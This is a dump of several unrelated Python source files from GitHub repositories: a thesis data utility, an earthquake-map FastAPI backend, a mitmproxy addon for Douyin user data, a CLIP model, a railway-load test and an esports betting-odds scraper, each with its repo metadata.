HOLDS THE FUNCTION WHICH TAKES AN ARRAY OF POINTS AND CONVERTS IT TO A MATRIX, WHERE:\n FOR EACH (X,Y) OF THE MATRIX:\n IF (X,Y) IS IN THE ARRAY, THE INDEX WILL BE 1\n OTHERWISE, IT WILL BE 0\n :param: arr: a 2-D array which holds the coordinates of the scatterers\n :return: xQuantize X yQuantize grid simulating the array\n \"\"\"\n grid_array = np.zeros([xquantize, yquantize])\n grid_array[arr[:, 1], arr[:, 0]] = 255\n return grid_array.astype(np.uint8)\n\n @staticmethod\n def check_array_validity(scat_locations, x_rate, y_rate, dmin):\n \"\"\"\n :param scat_locations: 2D array containing the scatterer centers such that each row shows as follows:\n [x_coordinate, y_coordinate, scale]\n The size of the array is NX3\n :param x_rate: conversion rate pixel to micrometer in the x direction\n :param y_rate: conversion rate pixel to micrometer in the y direction\n :param dmin: minimal allowed distance in micro-meters\n :return: The function checks the distance between each scatterer and the other scatterers, computes the distance\n to the closest cylinder and checks that it is above the threshold. if the closest cylinder is below the\n threshold,we discard one of the cylinders based on their scale (bigger is better)\n \"\"\"\n # ==============================================================================================================\n # Local variables\n # ==============================================================================================================\n valid_array = np.zeros_like(scat_locations)\n indexes = np.array(list(range(scat_locations.shape[0])))\n rates = np.array([x_rate, y_rate])\n counter = 0\n # ==============================================================================================================\n # for each coordinate running the following\n # ==============================================================================================================\n for ii, coordinate in enumerate(scat_locations):\n # ------------------------------------------------------------------------------------------------------\n # Computing distance to all other cylinders\n # ------------------------------------------------------------------------------------------------------\n loc = coordinate[0:2]\n diffs = np.sqrt(np.sum(np.power((scat_locations[:, 0:2] - loc) * rates, 2), axis=1))\n diffs = np.delete(diffs, ii)\n # ------------------------------------------------------------------------------------------------------\n # if min distance is bigger than threshold, add coordinate, else checking for the largest scale\n # ------------------------------------------------------------------------------------------------------\n if np.min(diffs) >= dmin:\n valid_array[counter] = coordinate\n counter += 1\n else:\n candidates = scat_locations[np.delete(indexes, ii)]\n candidates = candidates[diffs < dmin]\n if coordinate[2] > np.max(candidates[:, 2]):\n valid_array[counter] = coordinate\n counter += 1\n return valid_array[:counter]\n\n @staticmethod\n def find_differences(inputs, target, x_rate, y_rate, dmin):\n \"\"\"\n :param inputs: N X 2 array of coordinates\n :param target: M X 2 array of coordinates\n :param x_rate: conversion ratio pixel/micrometer in the x dimension\n :param y_rate: conversion ratio pixel/micrometer in the y dimension\n :param dmin: minimal distance between scatterers\n :return: function returns two arrays:\n 1. input_unique - K x 2 array with coordinates unique to input\n 2. target_unique - Q X 2 array with coordinates unique to target\n Decision rule is as follows:\n 1. Iterating over the target coordinates, computing distances between each coordinate and the input\n coordinates.\n 1.1. If closest distance is smaller than dmin / 2, not unique to target\n 1.2. else, unique to target\n 2. Iterating over the input coordinates, computing distances between each coordinate and the input\n coordinates.\n 2.1. If closest distance is smaller than dmin / 2, not unique to input\n 2.2. else, unique to input\n \"\"\"\n rates = np.array([x_rate, y_rate])\n target_unique = []\n target_approx = []\n inputs_unique = []\n inputs_approx = []\n commons = []\n # ==============================================================================================================\n # For each coordinate in the target coordinates, running the following\n # ==============================================================================================================\n for ii, coordinate in enumerate(target):\n # ------------------------------------------------------------------------------------------------------\n # Computing distance to all other cylinders\n # ------------------------------------------------------------------------------------------------------\n loc = coordinate[0:2]\n diffs = np.sqrt(np.sum(np.power((inputs[:, 0:2] - loc) * rates, 2), axis=1))\n # ------------------------------------------------------------------------------------------------------\n # if min distance is bigger than threshold, add coordinate\n # ------------------------------------------------------------------------------------------------------\n if np.min(diffs) > dmin / 2:\n target_unique.append(list(coordinate))\n elif np.min(diffs) > 0:\n target_approx.append(list(coordinate))\n else:\n commons.append(list(coordinate))\n # ==============================================================================================================\n # For each coordinate in the input coordinates, running the following\n # ==============================================================================================================\n for ii, coordinate in enumerate(inputs):\n # ------------------------------------------------------------------------------------------------------\n # Computing distance to all other cylinders\n # ------------------------------------------------------------------------------------------------------\n loc = coordinate[0:2]\n diffs = np.sqrt(np.sum(np.power((target[:, 0:2] - loc) * rates, 2), axis=1))\n # ------------------------------------------------------------------------------------------------------\n # if min distance is bigger than threshold, add coordinate\n # ------------------------------------------------------------------------------------------------------\n if np.min(diffs) > dmin:\n inputs_unique.append(list(coordinate))\n elif np.min(diffs) > 0:\n inputs_approx.append(list(coordinate))\n return np.array(inputs_unique), np.array(target_unique), np.array(inputs_approx), np.array(target_approx), np.array(commons)\n\n @staticmethod\n def save_array(scat_locations, sensitivity, path, name=None, target_sensitivity=None):\n \"\"\"\n :param scat_locations: NX3 array with N scatterer coordiantes:\n [x_coord, y_coord, scale]\n :param sensitivity: matching sensitivity of the array\n :param path: path to save the data\n :param name:optional, name of the csv file\n :param target_sensitivity\n :return:\n \"\"\"\n titles = ['x_coordinate', 'y_coordinate', 'scale', 'value']\n sens_row = ['sensitivity', sensitivity] if target_sensitivity is None else ['sensitivity', sensitivity, 'target', target_sensitivity]\n filename = 'scatterer_coordinates.csv' if name is None else name\n with open(os.path.join(path, filename), 'w', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(titles)\n writer.writerow(sens_row)\n for row in scat_locations:\n writer.writerow(row)\n\n\n# ==================================================================================================================\n# Misc functions\n# ==================================================================================================================\nclass PathFindingFunctions:\n def __init__(self):\n pass\n\n @staticmethod\n def get_latest_dir(path):\n \"\"\"\n :param path: a path to a directory with sub directories\n :return: the name of the newest directory\n \"\"\"\n all_subdirs = [os.path.join(path, d) for d in os.listdir(path) if os.path.isdir(os.path.join(path, d))]\n latest_subdir = max(all_subdirs, key=os.path.getmtime)\n return latest_subdir\n\n @staticmethod\n def get_latest_model(path):\n all_subfiles = [os.listdir(d) for d in os.listdir(path) if 'tar' in d]\n latest_subfile = max(all_subfiles, key=os.path.getmtime)\n return latest_subfile\n\n @staticmethod\n def get_full_path(path, epoch=None):\n save_files = [os.path.join(path, d) for d in os.listdir(path) if \"epoch\" in d]\n if epoch is None:\n epoch_nums = [int(file.split(sep='_')[-1][0:-4]) for file in save_files[1:]]\n epoch = max(epoch_nums)\n chosen_file = [d for d in save_files if np.all((str(epoch) in d.split('\\\\')[-1], d[-3:] == 'tar'))][0]\n return chosen_file\n","repo_name":"TomerGeva/THESIS","sub_path":"common/database_functions.py","file_name":"database_functions.py","file_ext":"py","file_size_in_byte":26132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29984317098","text":"import logging\nimport os.path\nimport sys\n\nimport requests\nimport sentry_sdk\nimport urllib3\nimport uvicorn\nfrom dotenv import load_dotenv\nfrom fastapi import FastAPI\nfrom fastapi.exception_handlers import http_exception_handler\nfrom fastapi.exceptions import RequestValidationError\nfrom loguru import logger\nfrom sentry_sdk.integrations.logging import BreadcrumbHandler, EventHandler, LoggingIntegration\nfrom starlette.exceptions import HTTPException as StarletteHTTPException\nfrom starlette.middleware.cors import CORSMiddleware\nfrom starlette.middleware.gzip import GZipMiddleware\nfrom starlette.responses import JSONResponse\nfrom starlette.staticfiles import StaticFiles\nfrom urllib3.exceptions import InsecureRequestWarning\n\nimport config\nfrom env import Env\nfrom internal.centroid import Centroid\nfrom internal.db import Database\nfrom internal.dmdata import DMDataFetcher\nfrom internal.geojson import GeoJson\nfrom internal.intensity2color import IntensityToColor\nfrom internal.modules_init import module_manager\nfrom internal.pswave import PSWave\nfrom routers import global_earthquake_router, earthquake_router, shake_level_router, tsunami_router, debug_router, \\\n heartbeat_router, index_router\nfrom schemas.config import RunEnvironment\nfrom schemas.router import GenericResponseModel\nfrom sdk import relpath\n\n# --- Constants\nRUN_ENV = RunEnvironment(os.getenv(\"ENV\")) \\\n if os.getenv(\"ENV\") \\\n else RunEnvironment.development\nload_dotenv(f\".{RUN_ENV.value}.env\")\n\n# --- Config initialization\nconfig.init_config(RUN_ENV)\nEnv.run_env = RUN_ENV\n\n# --- Error tracking initialization\nif Env.config.sentry.enabled:\n if os.getenv(\"SENTRY_URL\"):\n logger.debug(f\"SENTRY_URL={os.getenv('SENTRY_URL')}. sample_rate={Env.config.sentry.sample_rate}. \"\n f\"release={Env.version}\")\n _ = logger.add(\n BreadcrumbHandler(level=logging.DEBUG),\n diagnose=Env.config.logger.diagnose,\n level=logging.DEBUG,\n )\n _ = logger.add(\n EventHandler(level=logging.ERROR),\n diagnose=Env.config.logger.diagnose,\n level=logging.ERROR,\n )\n integrations = [\n LoggingIntegration(level=None, event_level=None),\n ]\n\n sentry_sdk.init(\n dsn=os.getenv(\"SENTRY_URL\"),\n traces_sample_rate=Env.config.sentry.sample_rate.traces,\n sample_rate=Env.config.sentry.sample_rate.errors,\n integrations=integrations,\n environment=RUN_ENV.value,\n release=f\"quakemap-back@{Env.version}\"\n )\n logger.success(\"Initialized sentry.\")\n else:\n logger.critical(\"Failed to initialize sentry: \"\n \"No SENTRY_URL defined in environment.\")\n sys.exit(1)\n\n# --- Runtime initialization\nurllib3.disable_warnings(InsecureRequestWarning)\n# Force IPV4: currently no ipv6 allowed\n# noinspection PyUnresolvedReferences\nrequests.packages.urllib3.util.connection.HAS_IPV6 = False\n\napp = FastAPI(\n docs_url=\"/docs\" if Env.config.utilities.doc else None,\n redoc_url=\"/redoc\" if Env.config.utilities.redoc else None\n)\n\napp.mount(\"/static\", StaticFiles(directory=relpath(\"static\")), name=\"static\")\n\n\n@app.exception_handler(RequestValidationError)\nasync def validation_exception_handler(_, __):\n return JSONResponse(status_code=500,\n content=GenericResponseModel.ServerError.value)\n\n\n@app.exception_handler(StarletteHTTPException)\nasync def custom_http_exception_handler(request, exc):\n if exc.status_code == 404:\n return JSONResponse(status_code=404,\n content=GenericResponseModel.NotFound.value)\n else:\n return await http_exception_handler(request, exc)\n\n\n# --- Router initialization\napp.include_router(global_earthquake_router)\napp.include_router(earthquake_router)\napp.include_router(shake_level_router)\napp.include_router(tsunami_router)\nif Env.run_env == RunEnvironment.testing:\n app.include_router(debug_router)\napp.include_router(heartbeat_router)\napp.include_router(index_router)\n\n# --- Middleware initialization\nif Env.config.utilities.cors:\n app.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n logger.success(\"Added CORS middleware.\")\napp.add_middleware(GZipMiddleware)\nlogger.success(\"Added gzip middleware.\")\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown_wrapper():\n module_manager.stop_program()\n\n\n# --- Internals initialization\nEnv.geojson_instance = GeoJson()\nEnv.centroid_instance = Centroid()\nEnv.intensity2color_instance = IntensityToColor()\nEnv.pswave_instance = PSWave()\nif Env.config.dmdata.enabled:\n Env.dmdata_instance = DMDataFetcher()\nEnv.db_instance = Database()\nmodule_manager.init()\n\nif __name__ == \"__main__\":\n # noinspection PyTypeChecker\n uvicorn.run(\n app,\n host=Env.config.server.host,\n port=int(Env.config.server.port)\n )\n","repo_name":"RealAllenDa/quakemap-backend","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40644491113","text":"import mitmproxy.http\r\nimport json\r\nfrom lib.shortid import Short_ID\r\n\r\nspider_id = Short_ID()\r\n\r\n\r\nclass Fans():\r\n def response(self, flow: mitmproxy.http.flow):\r\n if \"aweme/v1/user/?user_id\" in flow.request.url:\r\n user = json.loads(flow.response.text)[\"user\"]\r\n short_id = user[\"short_id\"]\r\n nickname = user['nickname']\r\n uid = user[\"uid\"]\r\n short_id = spider_id(uid) if short_id == \"0\" else short_id\r\n data = {\r\n \"short_id\": short_id,\r\n \"nickname\": nickname,\r\n \"uid\": uid,\r\n }\r\n print(data)\r\n","repo_name":"litufu/douyinbot","sub_path":"addons/fans.py","file_name":"fans.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41449406363","text":"import os\nimport hashlib\nimport urllib\nimport warnings\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport PIL\nfrom tqdm import tqdm\nfrom typing import Tuple, Union, List\nfrom image_encoder import ViT\nfrom text_encoder import TransformerTextEncoder\nfrom utils import augment_image\nfrom tokenizer import SimpleTokenizer\n\nclass CLIP(nn.Module):\n def __init__(\n self,\n emb_dim: int = 512, # Multi-modal embedding space of images and text encodings\n temperature: Tuple[float, float] = (0.07, 100), # Define temperature values (initial, maximum)\n # Parameters for images\n image_size: int = 224, # Size of the input image\n patch_size: int = 32, # Size of the patch in which the image will be divided\n vision_blocks: int = 12, # Number of blocks that compose the vision transformer (i.e. the depth) [possible values from the paper: 12, 24]\n vision_width: int = 768, # Dimension for the image embeddings [possible values from the paper: 768, 1024]\n vision_heads: int = 12, # Number of heads for each multihead attention layer in the vision transformer [possible values from the paper: 12, 16]\n # Parameters for text\n max_length: int = 76, # Maximum sequence length\n vocab_size: int = 49408, # Size of the text's vocabulary\n text_blocks: int = 12, # Number of blocks that compose the transformer (i.e. the depth) [possible values from the paper: 12, 16]\n text_width: int = 512, # Dimension for the text embeddings [possible values from the paper: 512, 768]\n text_heads: int = 8 # Number of heads for each multi-head attention layer in the transformer [possible values from the paper: 8, 12]\n ):\n super().__init__()\n\n self.max_length = max_length\n self.image_size = image_size\n self.initial_temp = temperature[0]\n self.max_temp = temperature[1]\n\n # Define image encoder (Vision Transformer)\n self.image_encoder = ViT(image_size=image_size, patch_size=patch_size, output_dim=emb_dim, width=vision_width, n_blocks=vision_blocks, n_heads=vision_heads, channels=3, head_dim=64, dropout=0.5)\n\n # Define text encoder (vanilla Transformer)\n self.text_encoder = TransformerTextEncoder(output_dim=emb_dim, vocab_size=vocab_size, max_length=max_length, width=text_width, n_blocks=text_blocks, n_heads=text_heads, head_dim=64, dropout=0.5, tensor_type=self.image_encoder.conv1.weight.dtype)\n\n # Define logit scale -> scales pairwise cosine similarities\n self.logit_scale = nn.Parameter(torch.tensor([np.log(1 / self.initial_temp)])) # We use numpy because it seems to be more precise\n\n def load_pretrained_from_file(self, path: str):\n clip = CLIP()\n clip.load_state_dict(torch.load(path))\n return clip\n\n def encode_image(self, image: torch.Tensor) -> torch.Tensor:\n ''' Encodes an image '''\n return self.image_encoder(image.type(self.image_encoder.conv1.weight.dtype))\n\n def encode_text(self, text: torch.Tensor) -> torch.Tensor:\n ''' Encodes text '''\n return self.text_encoder(text)\n \n def predict(\n self, \n # model: torch.nn.Module, \n images: Union[torch.Tensor, PIL.Image.Image], \n texts: Union[torch.Tensor, List[str]], \n tokenizer: SimpleTokenizer,\n device: torch.DeviceObjType, \n top_k_returns: int = 5\n ):\n ''' Takes in a pretrained model, the processed images and texts, model's device, and returns the number (\"top_k_returns\") of top probabilities and labels '''\n\n # Process images\n images = torch.stack([augment_image(image, self.image_size) for image in images])\n # Tokenize texts if needed\n if isinstance(texts, list):\n text_input = torch.zeros(len(texts), self.max_length, dtype=torch.long)\n sot_token = tokenizer.encoder['<|startoftext|>']\n eot_token = tokenizer.encoder['<|endoftext|>']\n\n for i, tokens in enumerate(texts):\n tokens = [sot_token] + tokens + [eot_token]\n text_input[i, :len(tokens)] = torch.tensor(tokens)\n \n texts = text_input\n \n # Move tensors to device\n images = images.to(device)\n texts = texts.to(device)\n\n # Get prediction from model\n with torch.no_grad():\n # Get image features\n image_features = self.encode_image(images)\n # Get text features and normalize\n text_features = self.encode_text(texts)\n text_features /= text_features.norm(dim=-1, keepdim=True)\n \n # Get text probabilities\n text_probs = (100.0 * image_features @ text_features.T).softmax(dim=-1)\n # Get top 5 probabilities and labels\n top_probs, top_labels = text_probs.cpu().topk(top_k_returns, dim=-1)\n\n return top_probs, top_labels\n\n def forward(self, image: torch.Tensor, text: torch.Tensor):\n # Get image and text features\n image_features = self.image_encoder(image.type(self.image_encoder.conv1.weight.dtype))\n text_features = self.text_encoder(text)\n\n # Normalize features\n image_embedding = image_features / image_features.norm(dim=-1, keepdim=True)\n text_embedding = text_features / text_features.norm(dim=-1, keepdim=True)\n\n # Cosine similarity as logits\n logit_scale = torch.clamp(self.logit_scale.exp(), max=self.max_temp).type(image_embedding.dtype)\n logits_per_image = logit_scale * image_embedding @ text_embedding.t()\n logits_per_text = logit_scale * text_embedding @ image_embedding.t()\n\n return logits_per_image, logits_per_text\n","repo_name":"cgMuro/State-of-Art","sub_path":"CLIP/clip.py","file_name":"clip.py","file_ext":"py","file_size_in_byte":5886,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"20053474628","text":"'''\nThis is the environment artist tester. It will extend the ArtistTester class.\n'''\n\nfrom artist_tester import ArtistTester\nfrom robot_artist import RobotArtist\n\nclass EnvironmentArtistTester(ArtistTester):\n # Constructor\n def __init__(self):\n super().__init__()\n \n # Method for drawin the element.\n # In this case it is a single robot\n def draw_element(self):\n artist = EnvironmentArtist(1)\n artist.draw_all()\n\nif __name__ == \"__main__\":\n EnvironmentArtistTester()","repo_name":"margeobur/CS765-GroupD","sub_path":"environment_artist_tester.py","file_name":"environment_artist_tester.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"25822260155","text":"# -*- coding: utf-8 -*-\n''' Test values of slipstream effect according to EC1-2 clause 6.6. Home made test.'''\n\nfrom __future__ import division\nfrom __future__ import print_function\n\n__author__= \"Luis C. Pérez Tato (LCPT)\"\n__copyright__= \"Copyright 2022\"\n__license__= \"GPL\"\n__version__= \"3.0\"\n__email__= \"l.pereztato@gmail.com\"\n\nimport math\nfrom actions.railway_traffic import EC1_rail_load_models as ec1\n\nV= 200 # Maximum train speed (km/h)\nv= V/3.6 # Maximum train speed (m/s)\nr= 2200 # radius of curvature.\n\nLf= 5.0 # influence length of the loaded part of curved track on the bridge, which is most unfavourable for the design of the structural element under consideration [m].\n\nlocomotiveCentrifugalLoads= ec1.locomotiveLM1.getCentrifugalWheelLoads(v= v, Lf= Lf, r= r)\n\n\n# Check values.\nerr= 0.0\nrefValue= 38.418048710381626e3/2.0\nfor load in locomotiveCentrifugalLoads:\n err+= (load-refValue)**2\nerr= math.sqrt(err)\n\nimport os\nfrom misc_utils import log_messages as lmsg\nfname= os.path.basename(__file__)\nif (err<1e-11):\n print('test '+fname+': ok.')\nelse:\n lmsg.error(fname+' ERROR.')\n","repo_name":"xcfem/xc","sub_path":"verif/tests/actions/traffic_loads/railway_traffic/test_ec1_railway_centrifugal_force_02.py","file_name":"test_ec1_railway_centrifugal_force_02.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":196,"dataset":"github-code","pt":"31"} +{"seq_id":"9051207681","text":"# -*-coding:utf-8-*-\n\nimport sys,os\nsys.path.append(os.path.dirname(__file__) + os.sep + '../')\n\nfrom datetime import datetime\nfrom common_tool import get_response, get_log, redis_check\nfrom import_data_to_mysql import con_db\nfrom import_data_to_redis import RedisCache_checkAPI\nfrom setting import db_setting\n\n\"\"\"\n雷竞技网英雄联盟赔率爬虫\nurl: https://www.ray83.com/match/37198305\n\"\"\"\n\nleijingji_log = get_log('leijingji')\n# 爬虫流程:\n# 开始加载两页赛程的url:start_url, second_url\n# start_url = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=1&match_type=2',\n# second_url ='https://incpgameinfo.esportsworldlink.com/v2/match?page=2&match_type=2'\n# 从start_url和second_url中拿到id,拼凑得到详情url\n# 详情url中拿到对应赔率url:https://incpgameinfo.esportsworldlink.com/v2/odds?match_id=37219633\n\n# 今日\nstart_url = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=1&match_type=2'\n\n# 滚盘\ngunpan_url1 = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=1&match_type=1'\ngunpan_url2 = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=1&match_type=0'\ngunpan_url3 = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=2&match_type=0'\ngunpan_urls = [gunpan_url1, gunpan_url2, gunpan_url3]\n\n# 赛前\nbefor_url_1 = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=1&match_type=3'\nbefor_url_2 = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=2&match_type=3'\nbefor_url_3 = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=3&match_type=3'\nbefor_url_4 = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=4&match_type=3'\nbefor_url_5 = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=5&match_type=3'\nbefor_url_6 = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=6&match_type=3'\nbefor_url_7 = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=7&match_type=3'\nbefor_url_8 = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=8&match_type=3'\nbefor_url_9 = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=9&match_type=3'\n\nbefor_url = [befor_url_1, befor_url_2, befor_url_3, befor_url_4, befor_url_5, befor_url_6, befor_url_7,\n befor_url_8, befor_url_9]\n\n# 结束(此url进来的数据只用来更新win字段)\nend_url1 = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=1&match_type=4'\nend_url2 = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=2&match_type=4'\nend_url3 = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=3&match_type=4'\nend_url4 = 'https://incpgameinfo.esportsworldlink.com/v2/match?page=4&match_type=4'\n\nend_url = [end_url1, end_url2, end_url3, end_url4]\n\nmatch_url_start = 'https://incpgameinfo.esportsworldlink.com/v2/odds?match_id='\n\n\n\nheaders = {\n'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/83.0.4103.116 Safari/537.36'\n}\n\n# 创建数据库对象\ndb = con_db(db_setting['host'], db_setting['user'], db_setting['password'], db_setting['db'])\n# 创建redis对象\nredis = RedisCache_checkAPI()\n# 竞猜类型\n# 1: 全场获胜;2: 输赢(单局);3: 让分;4: 1血; 5: 5杀;6: 10杀;7: 首塔;8: 小龙首杀;9: 大龙首杀;10: 人头总数单双;\n# 11: 总击杀数大小;12: 比赛时长大小;13:五分钟内是否出现1血;14:击杀数最多;15:第一条小龙元素为;16:第一条小龙元素为“水”;\n# 17:第一条小龙元素为”土“ ;18: 第X局 第一条小龙元素为”火“;19:第X局 第一条小龙元素为”风“;20:小龙总击杀单双;21:首杀峡谷先锋;\n# 22:十四分钟内是否摧毁首塔;23:摧毁防御塔总数大小;24:摧毁防御塔总数单双;25:哪支队伍首先摧毁水晶兵营;26:10分钟总击杀;\n# 27:20分钟总击杀;28:全场正确比分;29:全场地图总数大小'\n\n# 雷竞技目前有的竞猜项目为以下,后面出现另外的再补充(获胜者如果是小局就改为输赢)\nbet_types = {\n '获胜者':1, '输赢':2, '地图让分':3, '获得一血':4, '谁先获得五杀':5,\n '摧毁第一座塔':7, '击杀第一条小龙':8, '谁先击杀第一只暴君':8, '击杀第一条大龙':9, '谁先击杀先知主宰':9, '杀敌总数单双':10, '杀敌总数大小':11\n}\n\n# 根据赔率类型判断是否与队伍相关,如果相关要关联队伍id(后端要用)(在bet_types_judge中的就与队伍相关)\nbet_types_judge = [1, 2, 3, 4, 5, 7, 8, 9]\n\n# 有盘口的赔率类型\nbet_types_handicap = [3, 11, 12, 29]\n\n\n\n# 网站存在有些title类型的竞猜接口不一定两两成对返还,有可能是返还四条数据(两条旧数据,两条新数据)\n# 这样抓取的第三四条会覆盖第一二条造成问题,所以需要过滤掉其中的两条新数据(保留旧数据)\ntitle_judge = ['地图让分']\n\n\n# status状态对应:\n# 0: 比赛尚未开始,正常更新 2: 结束 4: 封盘\n# 雷竞技与表中对应关系:\n# 1--0 4--4 2--4 5--2\nbet_status = {\n 1:0, 4:4, 2:4, 5:2\n}\n\n# 考虑到王者荣耀有bo7,且\nmatch_stage_bo = {\n 'final':0, 'r1':1, 'r2':2, 'r3':3, 'r4':4, 'r5':5, 'r6':6, 'r7':7\n}\n\ngame_type = {\n '英雄联盟':1,\n '王者荣耀':2\n}\n\ndef parse(url, headers):\n responses = get_response(url, headers)\n responses = responses['result']\n # print('源数据:', len(responses))\n source = '雷竞技'\n for response in responses:\n try:\n game_name = response['game_name']\n leagueName = response['tournament_name']\n # print('联赛名称:',game_name, leagueName)\n # 过滤只拿到英雄联盟的赔率(LPL, LCK, LCS, LEC, LDL)\n\n if game_name == '王者荣耀' or (game_name == '英雄联盟' and ('LPL' in leagueName or 'LCK' in leagueName or 'LCS'\n in leagueName or 'LEC' in leagueName or 'LDL' in leagueName )):\n # 有个lplol的需要过滤\n if 'LPLOL' not in leagueName:\n types = game_type[game_name]\n id = response['id']\n # print('网站的赛事id:',id)\n match_url = match_url_start + str(id)\n # print('详情赔率url:', match_url)\n responses_detail = get_response(match_url, headers)\n responses_detail = responses_detail['result']\n # print('详情数据:', responses_detail)\n match_name = response['match_name']\n # 有正确的团队名(带 'vs'字样)\n if ' - VS - ' in match_name:\n match_name = match_name.split(' - VS - ')\n source_a_name = match_name[0]\n source_b_name = match_name[1]\n start_time = response['start_time']\n start_time = datetime.strptime(start_time, '%Y-%m-%d %H:%M:%S')\n leagueName_pre = str(start_time.year) + ' '\n # 雷竞技的联赛名不带年份,要自己加上去,用比赛的年份判断出那一年再拼接上去\n # 例如 start_time:'2020-07-08' ---'2020 ' + leagueName\n leagueName = leagueName_pre + leagueName\n # print('leagueName:',leagueName)\n start_time = int(start_time.timestamp())\n start_time = str(start_time)\n source_matchid = str(id)\n\n # 先查找redis的zset集合中有没有对应网站的source_matchid,没有就添加\n # print('查找前的数据:', leagueName, source_a_name, source_b_name, start_time)\n result = redis_check(redis, game_name, db, source, leagueName, source_matchid, source_a_name,\n source_b_name, start_time)\n # print(result)\n if result:\n match_id = result[0]\n if match_id:\n sql_insert = 'update game_python_match set bet_id={0} where id={1}'.format(id, match_id)\n # print(sql_insert)\n db.update_insert(sql_insert)\n # print('记录bet_id字段完成')\n except Exception as e:\n leijingji_log.error(e, exc_info=True)\n\n\n # result = redis_check(redis, game_name, db, source, leagueName, source_matchid, source_a_name, source_b_name, start_time)\n # print('match_id:', result, source_a_name, source_b_name)\n # # 如果match_id为空,说明雷竞技的竞猜赛程在赛程表中没找到,这时不录入\n # if result:\n # match_id = result[0]\n # team_a_id = result[2]\n # team_b_id = result[3]\n # # 0-139条赔率数据,每两组构成一条数据库中的数据\n # # print(type(responses_detail['odds']), responses_detail['odds'])\n #\n # option_one_name = 'Null'\n # option_two_name = 'Null'\n # option_one_odds = 'Null'\n # option_two_odds = 'Null'\n # option_one_team_id = 'Null'\n # option_two_team_id = 'Null'\n # # odds中的数据两两拼成一条完整竞猜数据,用count的状态来判断添加到哪一个字段\n # count = True\n #\n # # 地图让分的赔率抓取比较复杂,由于网站出现多种,要进行取舍\n # # 暂定规则如下:\n # # 1.英雄联盟:拿到最开始的地图让分,后面出现新的也不要\n # # 2.王者荣耀:由于bo比较多,拿到\n # # 计算地图让分出现次数,过滤掉新数据\n # judge_exclude_dtrf = 0\n # # 列表计数\n # list_count = 0\n # # 假数据的索引列表\n # list_index = []\n # # 判断title_judge中的玩法是否超出两条数据,超出就过滤后来的新数据(status为1)\n # #目前网站上只有‘地图让分’有新旧数据的存在(保留旧数据)\n # for rate_message in responses_detail['odds']:\n # if rate_message['group_name'] == '地图让分':\n # judge_exclude_dtrf += 1\n # if rate_message['status'] == 1:\n # list_index.append(list_count)\n # list_count += 1\n # # print('新数据列表索引:', list_index)\n # responses_detail_list = responses_detail['odds']\n # # print('去除假数据之前:', len(responses_detail_list), responses_detail_list)\n # # 存在更新新数据情况时,根据新数据的索引列表去掉接口返回列表的新数据\n # if judge_exclude_dtrf > 2:\n # responses_detail_list = [responses_detail_list[i] for i in range(len(responses_detail_list)) if (i not in list_index)]\n # # print('去除新数据之后:', len(responses_detail_list), responses_detail_list)\n #\n #\n # # 接口数据整理完,开始第二次遍历入库\n # for rate_message in responses_detail_list:\n # # print('odds详情:', rate_message)\n # title = rate_message['group_name']\n # # match_stage: r1为第一局 r2为第二局... final为整个大局\n # match_stage = rate_message['match_stage']\n # board_num = match_stage_bo[match_stage]\n # # 暂时只要bet_type中的竞猜项目\n # if title in bet_types:\n #\n # # 将title为地图让分的标题更正为全场让分\n # title = '全场让分' if rate_message['group_name'] == '地图让分' else rate_message['group_name']\n # bet_type =3 if title == '全场让分' else bet_types[title]\n # # ’获胜者‘的match_stage不为final,bet_type改为‘输赢’\n # if title == '获胜者' and match_stage != 'final':\n # bet_type = 2\n # # 不知道是否保留所以先给0\n # end_time = 0\n # source_status = rate_message['status']\n # if source_status in bet_status:\n # status = bet_status[source_status]\n # # print('详细竞猜数据:', title, match_stage, source_status, status)\n # if count:\n # option_one_name = rate_message['name']\n # option_one_odds = rate_message['odds']\n # win_one = rate_message['win']\n # id_one = rate_message['id']\n # handicap_one = rate_message['value'] if bet_type in bet_types_handicap else 'null'\n # if bet_type in bet_types_judge:\n # option_one_team_id = team_a_id if source_a_name in option_one_name else team_b_id\n # else:\n # option_one_team_id = 'null'\n # count = False\n # # 如果存在status为4的赔率,过滤掉\n # else:\n # option_two_name = rate_message['name']\n # option_two_odds = rate_message['odds']\n # win_two = rate_message['win']\n # id_two = rate_message['id']\n # handicap_two = rate_message['value'] if bet_type in bet_types_handicap else 'null'\n # if bet_type in bet_types_judge:\n # # option_two_name 中带名\n # option_two_team_id = team_b_id if source_b_name in option_two_name else team_a_id\n # else:\n # option_two_team_id = 'null'\n # count = True\n #\n # # 添加竞猜数据的记录\n # if count and match_id != None:\n # # 盘口数据根据id小的判断,id小的为主队\n # handicap = handicap_one if id_one < id_two else 